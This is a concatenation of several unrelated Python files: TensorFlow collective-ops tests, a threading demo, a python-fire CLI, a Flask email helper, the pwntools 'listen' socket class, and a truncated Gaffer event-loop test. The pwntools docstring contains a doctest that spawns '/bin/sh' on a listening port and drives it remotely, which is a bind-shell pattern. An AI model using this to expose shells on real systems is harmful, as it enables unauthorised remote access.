communication_options=collective_util.Options(
implementation=implementation),
prefer_unique_instance_key=prefer_unique_instance_key)
group_size = options.num_processes * (options.gpus_per_process or 1)
inputs_data = ([
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[9.], [10.]], indices=[3, 4], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[11.], [12.]], indices=[3, 4], dense_shape=[5, 1])
], [
IndexedSlicesValue(
values=[[13.], [14.]], indices=[8, 9], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[15.], [16.]], indices=[3, 4], dense_shape=[5, 1])
])
inputs = inputs_data[0:group_size]
if group_size == 1:
expect = [
IndexedSlices(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
]
if group_size == 2:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
elif group_size == 4:
expect = [
IndexedSlices(
values=[[1.], [2.], [5.], [6.], [9.], [10.], [13.], [14.]],
indices=[0, 1, 1, 2, 3, 4, 8, 9],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.], [11.], [12.], [15.], [16.]],
indices=[1, 2, 0, 1, 3, 4, 3, 4],
dense_shape=[5, 2])
]
self.batch_reduce_and_verify(inputs, expect, options)
def testBatchReduceMixedDenseAndSparse(self):
options = self.RunOptions(
num_processes=2,
gpus_per_process=0,
reduce_op=ReduceOp.SUM,
mode=["func_graph"])
inputs_data = [
[
1.0, 2.0,
IndexedSlicesValue(
values=[[1.], [2.]], indices=[0, 1], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[3.], [4.]], indices=[1, 2], dense_shape=[5, 1])
],
[
3.0, 4.0,
IndexedSlicesValue(
values=[[5.], [6.]], indices=[1, 2], dense_shape=[10, 1]),
IndexedSlicesValue(
values=[[7.], [8.]], indices=[0, 1], dense_shape=[5, 1])
],
]
expect = [
4.0, 6.0,
IndexedSlices(
values=[[1.], [2.], [5.], [6.]],
indices=[0, 1, 1, 2],
dense_shape=[10, 1]),
IndexedSlices(
values=[[3.], [4.], [7.], [8.]],
indices=[1, 2, 0, 1],
dense_shape=[5, 1])
]
self.batch_reduce_and_verify(inputs_data, expect, options)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceDense(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = constant_op.constant(1.0)
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [1.0 * group_size] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [1.0] * len(devices)
self.assertAllClose(got, expect)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (constant_op.constant(1.0), constant_op.constant(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(1.0 * group_size, 2.0 * group_size)] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(1.0, 2.0)] * len(devices)
self.assertAllClose(got, expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
reduce_op=[ReduceOp.SUM, ReduceOp.MEAN],
))
def testAllReduceSparse(self, num_processes, required_gpus, implementation,
reduce_op):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
if (num_processes == 2 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip NCCL + 2 processes combination. NCCL requires "
"physical GPUs for every process.")
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = IndexedSlices(
values=array_ops.identity([[1.]]),
indices=array_ops.identity([0]),
dense_shape=array_ops.identity([5, 1]))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [IndexedSlices([[1. * group_size]], [0], [5, 1])
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [IndexedSlices([[1.]], [0], [5, 1])] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
if reduce_op == ReduceOp.SUM:
expect = [(IndexedSlices([[1. * group_size]], [0], [5, 1]),
IndexedSlices([[3. * group_size]], [2], [5, 1]))
] * len(devices)
elif reduce_op == ReduceOp.MEAN:
expect = [(IndexedSlices([[1.]], [0], [5, 1]),
IndexedSlices([[3.]], [2], [5, 1]))] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=0,
implementation=CommunicationImplementation.AUTO,
reduce_op=ReduceOp.SUM))
def testAllReduceMixedDenseAndSparse(self, num_processes, required_gpus,
implementation, reduce_op):
def replica_fn():
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
group_size = num_processes * (required_gpus or 1)
@def_function.function
def collective_batch_all_reduce():
results = []
for replica_id, device in enumerate(devices):
with ops.device(device):
value = (IndexedSlices(
array_ops.identity([[1.]]), array_ops.identity([0]),
array_ops.identity([5, 1])), array_ops.identity(1.0),
IndexedSlices(
array_ops.identity([[3.]]), array_ops.identity([2]),
array_ops.identity([5, 1])), array_ops.identity(2.0))
results.append(
collective._all_reduce(reduce_op, value, replica_id, options))
return results
got = collective_batch_all_reduce()
expect = [
(IndexedSlices([[1. * group_size]], [0], [5, 1]), 1.0 * group_size,
IndexedSlices([[3. * group_size]], [2], [5, 1]), 2.0 * group_size)
] * len(devices)
self.assertAllClose(
nest.map_structure(ops.convert_to_tensor, got),
nest.map_structure(ops.convert_to_tensor, expect))
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
axis=[0, 1, 2],
func_mode=["eager", "func_graph"],
implementation=[
CommunicationImplementation.AUTO,
CommunicationImplementation.RING,
CommunicationImplementation.NCCL,
],
prefer_unique_instance_key=[True, False]))
def testAllGatherSameShape(self, num_processes, required_gpus, implementation,
func_mode, axis, prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = constant_op.constant([[[1, 2], [1, 2]]], dtype=dtypes.float32)
def gather_fn():
per_replica_value = make_per_replica_value(value, devices)
gathered_values = collective._gather(
per_replica_value, per_replica_value, axis=axis, options=options)
gathered_values = self.as_list(gathered_values)
# Skip checking devices in eager. In eager the device attribute doesn't
# reflect the actual device of the tensor.
if not context.executing_eagerly():
self.assertAllEqual(devices, [v.device for v in gathered_values])
return [ops.convert_to_tensor(v) for v in gathered_values]
group_size = num_processes * (required_gpus or 1)
expect = array_ops.concat([value] * group_size, axis=axis)
per_replica_expect = [ops.convert_to_tensor(expect)] * len(devices)
if func_mode == "eager":
result = gather_fn()
self.assertAllClose(result, per_replica_expect)
if func_mode == "func_graph":
result = def_function.function(gather_fn)()
self.assertAllClose(result, per_replica_expect)
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=[1, 2],
required_gpus=[0, 1, 2],
implementation=[CommunicationImplementation.RING]))
def testCollectiveV2ControlFlow(self, num_processes, required_gpus,
implementation):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
value = make_per_replica_value(constant_op.constant([1.]), devices)
@def_function.function
def reduce_fn():
def cond_body():
reduced = collective.reduce(reduce_util.ReduceOp.SUM, value, value,
options)
return math_ops.add_n(self.as_list(reduced)) / len(devices)
return control_flow_ops.cond(
array_ops.identity(False), cond_body, cond_body)
num_replicas = num_processes * len(devices)
self.assertAllEqual(reduce_fn(), [1. * num_replicas])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.NCCL, CommunicationImplementation.RING
],
prefer_unique_instance_key=[True, False]))
def testMultiThreadedCollectiveLaunchNoInterleave(self, num_processes,
required_gpus,
implementation,
prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
# We would like to simulate the following sequence:
# thread-0 device0 device1
# thread-1 device0 device1
# If the kernel launch sequence is as-is the program will deadlock since
# NCCL requires the launch order to be same on each device.
v0 = make_per_replica_value(1.0, devices)
v1 = make_per_replica_value(2.0, devices)
      # Add a delay to collective_ops.all_reduce according to the input
      # tensor's index in `sequence`.
sequence = [v0.values[0], v1.values[0], v1.values[1], v0.values[1]]
all_reduce = collective_ops.all_reduce
def delayed_all_reduce(input_tensor, *args, **kwargs):
for idx, v in enumerate(sequence):
if input_tensor is v:
time.sleep(idx)
break
return all_reduce(input_tensor, *args, **kwargs)
with test.mock.patch.object(collective_ops, "all_reduce",
delayed_all_reduce):
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
def thread_fn():
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v0, v0), (v0, v0)], options)
self.assertAllEqual(reduced[0].values, [2.0, 2.0])
self.assertAllEqual(reduced[1].values, [2.0, 2.0])
t = threading.Thread(target=thread_fn)
t.start()
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v1, v1),
(v1, v1)],
options)
self.assertAllEqual(reduced[0].values, [4.0, 4.0])
self.assertAllEqual(reduced[1].values, [4.0, 4.0])
t.join()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=1,
required_gpus=2,
implementation=[
CommunicationImplementation.NCCL, CommunicationImplementation.RING
],
prefer_unique_instance_key=[True, False]))
def testInputsAreFunctionArgs(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(implementation=implementation)
@def_function.function
def reduce_fn(v):
# Function inputs don't have device placement.
self.assertEqual(v.values[0].device, "")
self.assertEqual(v.values[1].device, "")
# We only use NCCL for batch reduce with two or more values, so we use
# two values here.
reduced = collective.batch_reduce(reduce_util.ReduceOp.SUM, [(v, v),
(v, v)],
options)
self.assertEqual(reduced[0].values[0].device, devices[0])
self.assertEqual(reduced[0].values[1].device, devices[1])
self.assertEqual(reduced[1].values[0].device, devices[0])
self.assertEqual(reduced[1].values[1].device, devices[1])
        # Returning Mirrored only evaluates the primary value, which causes
        # hanging.
return [reduced[0].values, reduced[1].values]
v = make_per_replica_value(1.0, devices)
reduced = reduce_fn(v)
self.assertAllClose(reduced, [[2.0, 2.0], [2.0, 2.0]])
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceDense(self, num_processes, implementation, required_gpus,
prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_dense():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
      # while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceDense(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(1.0, devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_dense():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_dense()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutReduceSparse(self, num_processes, implementation,
required_gpus, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def reduce_sparse():
return collective.reduce(reduce_util.ReduceOp.SUM, v, v, options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(
combinations.combine(
num_processes=2,
required_gpus=[0, 1],
implementation=[
CommunicationImplementation.RING, CommunicationImplementation.NCCL
],
prefer_unique_instance_key=[True, False]))
def testTimeoutBatchReduceSparse(self, num_processes, required_gpus,
implementation, prefer_unique_instance_key):
if (required_gpus == 0 and
implementation == CommunicationImplementation.NCCL):
self.skipTest("Skip CPU + NCCL combination")
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = (
prefer_unique_instance_key)
collective, devices, task_id = self.make_collective(
num_processes, required_gpus)
if task_id != 0:
return
v = make_per_replica_value(
IndexedSlicesValue(
values=[[4., 6.]], indices=[1], dense_shape=[5, 2]), devices)
options = collective_util.Options(
timeout_seconds=1., implementation=implementation)
@def_function.function
def batch_reduce_sparse():
return collective.batch_reduce(reduce_util.ReduceOp.SUM,
[(v, v), (v, v)], options)
# The collective should time out because we only launch it on worker-0,
# while there're two workers in total.
with self.assertRaises(errors.DeadlineExceededError):
batch_reduce_sparse()
get_global_mpr(num_processes).run(replica_fn)
@combinations.generate(combinations.combine(num_processes=1, required_gpus=2))
def testNcclOrdering(self, num_processes, required_gpus):
def replica_fn():
CollectiveReplicaLauncher._prefer_unique_instance_key = True
CollectiveReplicaLauncher._prefer_ordering_token = True
collective, devices, _ = self.make_collective(num_processes,
required_gpus)
options = collective_util.Options(
implementation=CommunicationImplementation.NCCL)
v_dense = make_per_replica_value([1.0, 1.0], devices)
v_sparse = make_per_replica_value([
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
IndexedSlicesValue([[4., 6.], [5., 6.]], [1, 3], [5, 2]),
], devices)
@def_function.function
def nested_dense():
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
@def_function.function
def nested_sparse():
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# All collectives, function calls, if clause and while loops should be
# chained by control dependencies, so that the execution order is
# deterministic.
@def_function.function
def f():
# pylint: disable=pointless-statement
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reducing dense value.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
# reducing sparse value.
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# reduce dense value in nested tf.function.
nested_dense()
# reduce sparse value in nested tf.function.
nested_sparse()
# reduce dense value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
else:
v_dense
# reduce sparse value in tf.cond.
if array_ops.identity(1.0) > array_ops.identity(2.0):
v_sparse
else:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
# reduce dense value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
i += 1
# reduce sparse value in tf.while_loop.
i = array_ops.identity(1)
while i < 3:
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse,
options)
i += 1
# reducing dense and sparse value again.
collective.reduce(reduce_util.ReduceOp.SUM, v_dense, v_dense, options)
collective.reduce(reduce_util.ReduceOp.SUM, v_sparse, v_sparse, options)
# pylint: enable=pointless-statement
graph = f.get_concrete_function().graph
should_be_ordered = set([
"CollectiveReduceV2", "CollectiveGatherV2", "If", "While",
"StatefulPartitionedCall"
])
nodes_by_device = {}
for op in graph.get_operations():
if op.type in should_be_ordered:
if op.device not in nodes_by_device:
nodes_by_device[op.device] = []
nodes_by_device[op.device].append(op)
order = test_util.topological_sort_operations(graph.get_operations())
for device in devices:
device = device_util.canonicalize(device)
# Those function ops don't have device annotations, but they contain
# collectives for both devices so we always include them.
operations = nodes_by_device[device] + nodes_by_device[""]
# Verify that we get all types of nodes we want.
self.assertEqual(set(op.type for op in operations), should_be_ordered)
test_util.assert_sequential_execution(order, operations)
get_global_mpr(num_processes).run(replica_fn)
if __name__ == "__main__":
# Set default inter op thread pool size to one to ensure we don't exhaust the
# thread pool with the additional executors to run collectives in eager.
os.environ["TF_NUM_INTEROP_THREADS"] = "1"
# TODO(b/172304955): figure why logical devices doesn't work.
test_util.main(config_logical_devices=False)
|
p290_test1561.py
|
import threading
threadObj = threading.Thread(target=print, args=['Cats', 'Dogs', 'Frogs'], kwargs={'sep': ' & '})
threadObj.start()
"""
Cats & Dogs & Frogs
"""
|
fire_cli.py
|
import json
import sys
import threading
from io import StringIO
import fire
def json_dump(obj):
print(json.dumps(obj, indent=4, sort_keys=True, default=str)) # https://stackoverflow.com/a/11875813/973425
class Root():
"""
Root
"""
cmd_history = []
def __init__(self):
pass
def dummy_json(self):
obj = {
"key1": [
"val1",
{
"key2": "val2",
"key3": 3.6
}
]
}
json_dump(obj)
def echo(self, arg):
"""
JSON arg Tested : echo '{"a":"123", "tois":{"moins":12, "hil":["hodor", "mind"]}}'
:param arg:
:return:
"""
json_dump(arg)
def history(self):
for cmd in Root.cmd_history:
json_dump(cmd)
def main():
if len(sys.argv) > 1:
args = ""
for arg in sys.argv[1:]:
args += " " + arg
fire.Fire(Root, args)
Root.cmd_history.append(args)
else:
print("no args...")
while True:
cmd = input()
fire.Fire(Root, cmd)
Root.cmd_history.append(cmd)
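# Illustrative invocations (assumed shell usage, not part of the module); each
# argument string is handed to fire.Fire(Root, ...) and dispatched to a method:
#   python fire_cli.py dummy_json
#   python fire_cli.py echo '{"a": "123", "tois": {"moins": 12, "hil": ["hodor", "mind"]}}'
#   python fire_cli.py history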
def fire_task_wrapper(cmd, emit):
class TeeIn(StringIO):
def write(self, s):
emit('my response', {'stdin': s})
StringIO.write(self, s)
sys.__stdin__.write(s)
class TeeOut(StringIO):
def write(self, s):
emit('my response', {'stdout': s})
StringIO.write(self, s)
sys.__stdout__.write(s)
class TeeErr(StringIO):
def write(self, s):
emit('my response', {'stderr': s})
StringIO.write(self, s)
sys.__stderr__.write(s)
# @processify
def fire_task(command):
# Save everything that would otherwise go to stdout.
stdin = TeeIn()
sys.stdin = stdin
stdout = TeeOut()
sys.stdout = stdout
stderr = TeeErr()
sys.stderr = stderr
fire.Fire(Root, command)
pass
# fire_task(cmd)
    t = threading.Thread(name='child procs', target=fire_task, args=(cmd,))
t.start()
pass
if __name__ == "__main__":
main()
|
email.py
|
from flask import render_template
from flask_mail import Message
from app import mail,app
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email('[Microblog] Reset Your Password',
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',user=user, token=token),
html_body=render_template('email/reset_password.html',user=user, token=token)
)
|
listen.py
|
from __future__ import absolute_import
from __future__ import division
import errno
import socket
from pwnlib.context import context
from pwnlib.log import getLogger
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
log = getLogger(__name__)
class listen(sock):
r"""Creates an TCP or UDP-socket to receive data on. It supports
both IPv4 and IPv6.
The returned object supports all the methods from
:class:`pwnlib.tubes.sock` and :class:`pwnlib.tubes.tube`.
Arguments:
port(int): The port to connect to.
Defaults to a port auto-selected by the operating system.
bindaddr(str): The address to bind to.
Defaults to ``0.0.0.0`` / `::`.
fam: The string "any", "ipv4" or "ipv6" or an integer to pass to :func:`socket.getaddrinfo`.
typ: The string "tcp" or "udp" or an integer to pass to :func:`socket.getaddrinfo`.
Examples:
>>> l = listen(1234)
>>> r = remote('localhost', l.lport)
>>> _ = l.wait_for_connection()
>>> l.sendline(b'Hello')
>>> r.recvline()
b'Hello\n'
>>> l = listen()
>>> l.spawn_process('/bin/sh')
>>> r = remote('localhost', l.lport)
>>> r.sendline(b'echo Goodbye')
>>> r.recvline()
b'Goodbye\n'
"""
#: Local port
lport = 0
#: Local host
lhost = None
#: Socket type (e.g. socket.SOCK_STREAM)
type = None
#: Socket family
family = None
#: Socket protocol
protocol = None
#: Canonical name of the listening interface
canonname = None
#: Sockaddr structure that is being listened on
sockaddr = None
_accepter = None
def __init__(self, port=0, bindaddr = "0.0.0.0",
fam = "any", typ = "tcp", *args, **kwargs):
super(listen, self).__init__(*args, **kwargs)
port = int(port)
fam = {socket.AF_INET: 'ipv4',
socket.AF_INET6: 'ipv6'}.get(fam, fam)
fam = self._get_family(fam)
typ = self._get_type(typ)
if fam == socket.AF_INET6 and bindaddr == '0.0.0.0':
bindaddr = '::'
h = self.waitfor('Trying to bind to %s on port %d' % (bindaddr, port))
for res in socket.getaddrinfo(bindaddr, port, fam, typ, 0, socket.AI_PASSIVE):
self.family, self.type, self.proto, self.canonname, self.sockaddr = res
if self.type not in [socket.SOCK_STREAM, socket.SOCK_DGRAM]:
continue
h.status("Trying %s" % self.sockaddr[0])
listen_sock = socket.socket(self.family, self.type, self.proto)
listen_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listen_sock.bind(self.sockaddr)
self.lhost, self.lport = listen_sock.getsockname()[:2]
if self.type == socket.SOCK_STREAM:
listen_sock.listen(1)
break
else:
h.failure()
self.error("Could not bind to %s on port %d" % (bindaddr, port))
h.success()
h = self.waitfor('Waiting for connections on %s:%s' % (self.lhost, self.lport))
def accepter():
while True:
try:
if self.type == socket.SOCK_STREAM:
self.sock, rhost = listen_sock.accept()
listen_sock.close()
else:
data, rhost = listen_sock.recvfrom(4096)
listen_sock.connect(rhost)
self.sock = listen_sock
self.unrecv(data)
self.settimeout(self.timeout)
break
except socket.error as e:
if e.errno == errno.EINTR:
continue
h.failure()
self.exception("Socket failure while waiting for connection")
self.sock = None
return
self.rhost, self.rport = rhost[:2]
h.success('Got connection from %s on port %d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def spawn_process(self, *args, **kwargs):
def accepter():
self.wait_for_connection()
self.sock.setblocking(1)
p = super(listen, self).spawn_process(*args, **kwargs)
p.wait()
self.close()
t = context.Thread(target = accepter)
t.daemon = True
t.start()
def wait_for_connection(self):
"""Blocks until a connection has been established."""
        # Accessing self.sock goes through __getattr__ below, which joins the
        # accepter thread, so this line blocks until a connection is accepted.
        self.sock
return self
def __getattr__(self, key):
if key == 'sock':
self._accepter.join(timeout = self.timeout)
if 'sock' in self.__dict__:
return self.sock
else:
return None
else:
return getattr(super(listen, self), key)
def close(self):
# since `close` is scheduled to run on exit we must check that we got
# a connection or the program will hang in the `join` call above
if self._accepter and self._accepter.is_alive():
return
super(listen, self).close()
|
EventLoopTest.py
|
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import time
import functools
import IECore
import Gaffer
import GafferUI
import GafferUITest
from Qt import QtCore
from Qt import QtWidgets
class EventLoopTest( GafferUITest.TestCase ) :
def testIdleCallbacks( self ) :
self.__idleCalls = 0
def idle() :
self.__idleCalls += 1
return self.__idleCalls < 2
def stop() :
if self.__idleCalls==2 :
GafferUI.EventLoop.mainEventLoop().stop()
return False
return True
GafferUI.EventLoop.addIdleCallback( idle )
GafferUI.EventLoop.addIdleCallback( stop )
GafferUI.EventLoop.mainEventLoop().start()
self.assertEqual( self.__idleCalls, 2 )
def testWaitForIdle( self ) :
self.__idleCalls = 0
def idle( total ) :
self.__idleCalls += 1
return self.__idleCalls < total
GafferUI.EventLoop.addIdleCallback( functools.partial( idle, 1000 ) )
GafferUI.EventLoop.waitForIdle()
self.assertEqual( self.__idleCalls, 1000 )
GafferUI.EventLoop.addIdleCallback( functools.partial( idle, 1005 ) )
GafferUI.EventLoop.waitForIdle( 5 )
self.assertEqual( self.__idleCalls, 1005 )
def testExecuteOnUITheadAndWaitForResult( self ) :
def f() :
GafferUI.EventLoop.mainEventLoop().stop()
self.__uiThreadFunctionCalled = True
self.__uiThreadCalledOnCorrectThread = QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread()
return 101
def t() :
self.__uiThreadResult = GafferUI.EventLoop.executeOnUIThread( f, waitForResult=True )
thread = threading.Thread( target = t )
